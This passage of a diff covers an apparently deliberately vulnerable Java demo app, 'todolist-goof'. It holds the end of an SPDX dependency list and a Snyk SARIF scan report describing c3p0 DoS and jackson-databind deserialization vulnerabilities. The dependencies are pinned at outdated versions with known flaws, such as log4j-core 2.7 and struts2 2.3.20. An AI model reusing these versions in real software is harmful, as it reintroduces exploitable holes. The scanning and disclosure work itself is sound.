Info":"1.1.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/commons-logging/commons-logging@1.1.1"}]},{"name":"org.ow2.asm:asm","SPDXID":"SPDXRef-45-org.ow2.asm-asm-5.0.2","versionInfo":"5.0.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.ow2.asm/asm@5.0.2"}]},{"name":"org.ow2.asm:asm-commons","SPDXID":"SPDXRef-46-org.ow2.asm-asm-commons-5.0.2","versionInfo":"5.0.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.ow2.asm/asm-commons@5.0.2"}]},{"name":"javassist:javassist","SPDXID":"SPDXRef-47-javassist-javassist-3.11.0.GA","versionInfo":"3.11.0.GA","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/javassist/javassist@3.11.0.GA"}]},{"name":"org.springframework:spring-jdbc","SPDXID":"SPDXRef-48-org.springframework-spring-jdbc-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator
":"pkg:maven/org.springframework/spring-jdbc@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-tx","SPDXID":"SPDXRef-49-org.springframework-spring-tx-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-tx@3.2.6.RELEASE"}]},{"name":"org.springframework:spring-context-support","SPDXID":"SPDXRef-50-org.springframework-spring-context-support-3.2.6.RELEASE","versionInfo":"3.2.6.RELEASE","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.springframework/spring-context-support@3.2.6.RELEASE"}]},{"name":"asm:asm","SPDXID":"SPDXRef-51-asm-asm-3.3.1","versionInfo":"3.3.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/asm/asm@3.3.1"}]},{"name":"org.jboss.logging:jboss-logging-annotations","SPDXID":"SPDXRef-52-org.jboss.logging-jboss-logging-annotations-1.2.0.Beta1","versionInfo":"1.2.0.Beta1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss.logging/jboss-logging-annotations@1.2.0.Beta1"}]},{"name":"org.jboss.spec.javax.transaction:jboss-transaction-api_1.2_spec","SPDXID":"
SPDXRef-53-org.jboss.spec.javax.transaction-jboss-transaction-api-1.2-spec-1.0.0.Final","versionInfo":"1.0.0.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss.spec.javax.transaction/jboss-transaction-api_1.2_spec@1.0.0.Final"}]},{"name":"dom4j:dom4j","SPDXID":"SPDXRef-54-dom4j-dom4j-1.6.1","versionInfo":"1.6.1","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/dom4j/dom4j@1.6.1"}]},{"name":"org.hibernate.common:hibernate-commons-annotations","SPDXID":"SPDXRef-55-org.hibernate.common-hibernate-commons-annotations-4.0.5.Final","versionInfo":"4.0.5.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate.common/hibernate-commons-annotations@4.0.5.Final"}]},{"name":"org.hibernate.javax.persistence:hibernate-jpa-2.1-api","SPDXID":"SPDXRef-56-org.hibernate.javax.persistence-hibernate-jpa-2.1-api-1.0.0.Final","versionInfo":"1.0.0.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.hibernate.javax.persistence/hibernate-jpa-2.1-api@1.0.0.Final"}]},{"name":"org.javassist:javassist","SPDXID":"SPDXRef-57-org.javassist-javass
ist-3.18.1-GA","versionInfo":"3.18.1-GA","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.javassist/javassist@3.18.1-GA"}]},{"name":"antlr:antlr","SPDXID":"SPDXRef-58-antlr-antlr-2.7.7","versionInfo":"2.7.7","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/antlr/antlr@2.7.7"}]},{"name":"org.jboss:jandex","SPDXID":"SPDXRef-59-org.jboss-jandex-1.1.0.Final","versionInfo":"1.1.0.Final","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.jboss/jandex@1.1.0.Final"}]},{"name":"org.ow2.asm:asm-tree","SPDXID":"SPDXRef-60-org.ow2.asm-asm-tree-5.0.2","versionInfo":"5.0.2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/org.ow2.asm/asm-tree@5.0.2"}]},{"name":"xml-apis:xml-apis","SPDXID":"SPDXRef-61-xml-apis-xml-apis-1.0.b2","versionInfo":"1.0.b2","supplier":"NOASSERTION","downloadLocation":"NOASSERTION","filesAnalyzed":false,"licenseConcluded":"NOASSERTION","licenseDeclared":"NOASSERTION","copyrightText":"NOASSERTION","externalRefs":[{"referenceCategory":"PACKAGE-MANAGER","referenceType":"purl","referenceLocator":"pkg:maven/xml-apis/xml-apis@1.0.b2"}]}],
"relationships":[{"spdxElementId":"SPDXRef-DOCUMENT","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DESCRIBES"},{"spdxElementId":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-3-org.apache.logging.log4j-log4j-core-2.7","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-4-org.apache.logging.log4j-log4j-api-2.7","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-5-javax-javaee-web-api-7.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-8-org.apache.struts-struts2-spring-plugin-2.3.20","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-9-org.zeroturnaround-zt-zip-1.12","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-10-javax.xml.bind-jaxb-api-2.3.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-11-com.sun.xml.bind-jaxb-core-2.3.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relatio
nshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-12-com.sun.xml.bind-jaxb-impl-2.3.0","relatedSpdxElement":"SPDXRef-1-io.github.snyk-todolist-web-struts-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-13-com.fasterxml.jackson.core-jackson-core-2.6.5","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-14-com.fasterxml.jackson.core-jackson-databind-2.6.5","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-15-com.fasterxml.jackson.core-jackson-annotations-2.6.5","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-17-javax.servlet-jstl-1.2","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-19-commons-collections-commons-collections-3.1","relatedSpdxElement":"SPDXRef-2-io.github.snyk-todolist-web-common-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-20-aopalliance-aopalliance-1.0","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-21-org.springframework-spring-aop-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-22-org.springframework-spring-beans-3.2.6.RELEASE","re
latedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-23-org.springframework-spring-context-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-24-org.springframework-spring-core-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-6-org.springframework-spring-web-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-26-org.freemarker-freemarker-2.3.19","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-27-ognl-ognl-3.0.6","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-28-commons-fileupload-commons-fileupload-1.3.1","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-29-commons-io-commons-io-2.2","relatedSpdxElement":"SPDXRef-7-org.apache.struts-struts2-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-30-org.apache.commons-commons-lang3-3.2","relatedSpdxElement":"SPDXRef-8-org.apache.struts-struts2-spring-plugin-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-31-org.slf4j-slf4j-api-1.6.6","relatedSpdxElement":"SPDXRef-9-org.zeroturnaround-zt-zip-1.12","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-33-org.springframework-spring-aspects-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todol
ist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-34-cglib-cglib-2.2.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-35-org.aspectj-aspectjweaver-1.8.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-36-c3p0-c3p0-0.9.1.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-37-org.hsqldb-hsqldb-2.3.2","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-39-org.hibernate-hibernate-entitymanager-4.3.7.Final","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-40-org.hibernate.javax.persistence-hibernate-jpa-2.0-api-1.0.1.Final","relatedSpdxElement":"SPDXRef-16-io.github.snyk-todolist-core-0.0.1-SNAPSHOT","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-41-javax.validation-validation-api-1.0.0.GA","relatedSpdxElement":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-42-org.jboss.logging-jboss-logging-3.1.0.CR2","relatedSpdxElement":"SPDXRef-18-org.hibernate-hibernate-validator-4.3.1.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-43-org.springframework-spring-expression-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-23-org.springframework-spring-context-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-44-commons-logging-commons-logging-1.1.1","relatedSpdxElement":"SPDXRef-24-org.s
pringframework-spring-core-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-45-org.ow2.asm-asm-5.0.2","relatedSpdxElement":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-46-org.ow2.asm-asm-commons-5.0.2","relatedSpdxElement":"SPDXRef-25-org.apache.struts.xwork-xwork-core-2.3.20","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-47-javassist-javassist-3.11.0.GA","relatedSpdxElement":"SPDXRef-27-ognl-ognl-3.0.6","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-48-org.springframework-spring-jdbc-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-49-org.springframework-spring-tx-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-32-org.springframework-spring-orm-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-50-org.springframework-spring-context-support-3.2.6.RELEASE","relatedSpdxElement":"SPDXRef-33-org.springframework-spring-aspects-3.2.6.RELEASE","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-51-asm-asm-3.3.1","relatedSpdxElement":"SPDXRef-34-cglib-cglib-2.2.2","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-52-org.jboss.logging-jboss-logging-annotations-1.2.0.Beta1","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-53-org.jboss.spec.javax.transaction-jboss-transaction-api-1.2-spec-1.0.0.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-54-dom4j-dom4j-1.6.1","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-55-org.hibernate.common-hibernate-commons-annotations-4.0.5.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate
-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-56-org.hibernate.javax.persistence-hibernate-jpa-2.1-api-1.0.0.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-57-org.javassist-javassist-3.18.1-GA","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-58-antlr-antlr-2.7.7","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-59-org.jboss-jandex-1.1.0.Final","relatedSpdxElement":"SPDXRef-38-org.hibernate-hibernate-core-4.3.7.Final","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-60-org.ow2.asm-asm-tree-5.0.2","relatedSpdxElement":"SPDXRef-46-org.ow2.asm-asm-commons-5.0.2","relationshipType":"DEPENDENCY_OF"},{"spdxElementId":"SPDXRef-61-xml-apis-xml-apis-1.0.b2","relatedSpdxElement":"SPDXRef-54-dom4j-dom4j-1.6.1","relationshipType":"DEPENDENCY_OF"}]}
+
diff --git a/todolist-goof/todolist-web-struts/test.sarif b/todolist-goof/todolist-web-struts/test.sarif
new file mode 100644
index 0000000000..82b387560f
--- /dev/null
+++ b/todolist-goof/todolist-web-struts/test.sarif
@@ -0,0 +1,7412 @@ +{ + "$schema": "https://raw.githubusercontent.com/oasis-tcs/sarif-spec/master/Schemata/sarif-schema-2.1.0.json", + "version": "2.1.0", + "runs": [ + { + "tool": { + "driver": { + "name": "Snyk Open Source", + "properties": { + "artifactsScanned": 60 + }, + "rules": [ + { + "id": "SNYK-JAVA-C3P0-461018", + "shortDescription": { + "text": "High severity - Denial of Service (DoS) vulnerability in c3p0:c3p0" + }, + "fullDescription": { + "text": "(CVE-2019-5427) c3p0:c3p0@0.9.1.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: c3p0:c3p0\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › c3p0:c3p0@0.9.1.2\n# Overview\n[c3p0:c3p0](https://mvnrepository.com/artifact/c3p0/c3p0) is a lIbrary for augmenting traditional (DriverManager-based) JDBC drivers with JNDI-bindable DataSources, including DataSources that implement Connection and Statement Pooling, as described by the jdbc3 spec and jdbc2 std extension. Note: This library is no longer maintained and has migrated to the artifact \r\n\"com.mchange:c3p0\"\n\nAffected versions of this package are vulnerable to Denial of Service (DoS) due to missing protections against recursive entity expansion when loading XML configurations.\n\n# Details\n\nDenial of Service (DoS) describes a family of attacks, all aimed at making a system inaccessible to its intended and legitimate users.\n\nUnlike other vulnerabilities, DoS attacks usually do not aim at breaching security. 
Rather, they are focused on making websites and services unavailable to genuine users resulting in downtime.\n\nOne popular Denial of Service vulnerability is DDoS (a Distributed Denial of Service), an attack that attempts to clog network pipes to the system by generating a large volume of traffic from many machines.\n\nWhen it comes to open source libraries, DoS vulnerabilities allow attackers to trigger such a crash or crippling of the service by using a flaw either in the application code or from the use of open source libraries.\n\nTwo common types of DoS vulnerabilities:\n\n* High CPU/Memory Consumption- An attacker sending crafted requests that could cause the system to take a disproportionate amount of time to process. For example, [commons-fileupload:commons-fileupload](SNYK-JAVA-COMMONSFILEUPLOAD-30082).\n\n* Crash - An attacker sending crafted requests that could cause the system to crash. For Example, [npm `ws` package](https://snyk.io/vuln/npm:ws:20171108)\n\n# Remediation\nThere is no fixed version for `c3p0:c3p0`.\n\n# References\n- [POC: Hackerone Report](https://hackerone.com/reports/509315)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-776", + "maven" + ], + "cvssv3_baseScore": 7.5, + "security-severity": "7.5" + } + }, + { + "id": "snyk:lic:maven:c3p0:c3p0:LGPL-3.0", + "shortDescription": { + "text": "High severity - LGPL-3.0 license vulnerability in c3p0:c3p0" + }, + "fullDescription": { + "text": "c3p0:c3p0@0.9.1.2" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Module: c3p0:c3p0\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › io.github.snyk:todolist-core@0.0.1-SNAPSHOT › c3p0:c3p0@0.9.1.2\nLGPL-3.0 license" + }, + "properties": { + "tags": [ + "security", + "maven" + ], + 
"security-severity": "undefined" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1009829", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-24750) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `com.pastdev.httpcomponents.configuration.JndiConfiguration`.\n\n# Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n## 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n## 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n## 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n## Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n# Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n# References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2798)\n" + }, + "properties": { + "tags": [ + "security", + "CWE-502", + "maven" + ], + "cvssv3_baseScore": 8.1, + "security-severity": "8.1" + } + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1047324", + "shortDescription": { + "text": "High severity - Deserialization of Untrusted Data vulnerability in com.fasterxml.jackson.core:jackson-databind" + }, + "fullDescription": { + "text": "(CVE-2020-10650) com.fasterxml.jackson.core:jackson-databind@2.6.5" + }, + "help": { + "text": "", + "markdown": "* Package Manager: maven\n* Vulnerable module: com.fasterxml.jackson.core:jackson-databind\n* Introduced through: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT, io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT and others\n### Detailed paths\n* _Introduced through_: io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT › io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT › com.fasterxml.jackson.core:jackson-databind@2.6.5\n# Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. 
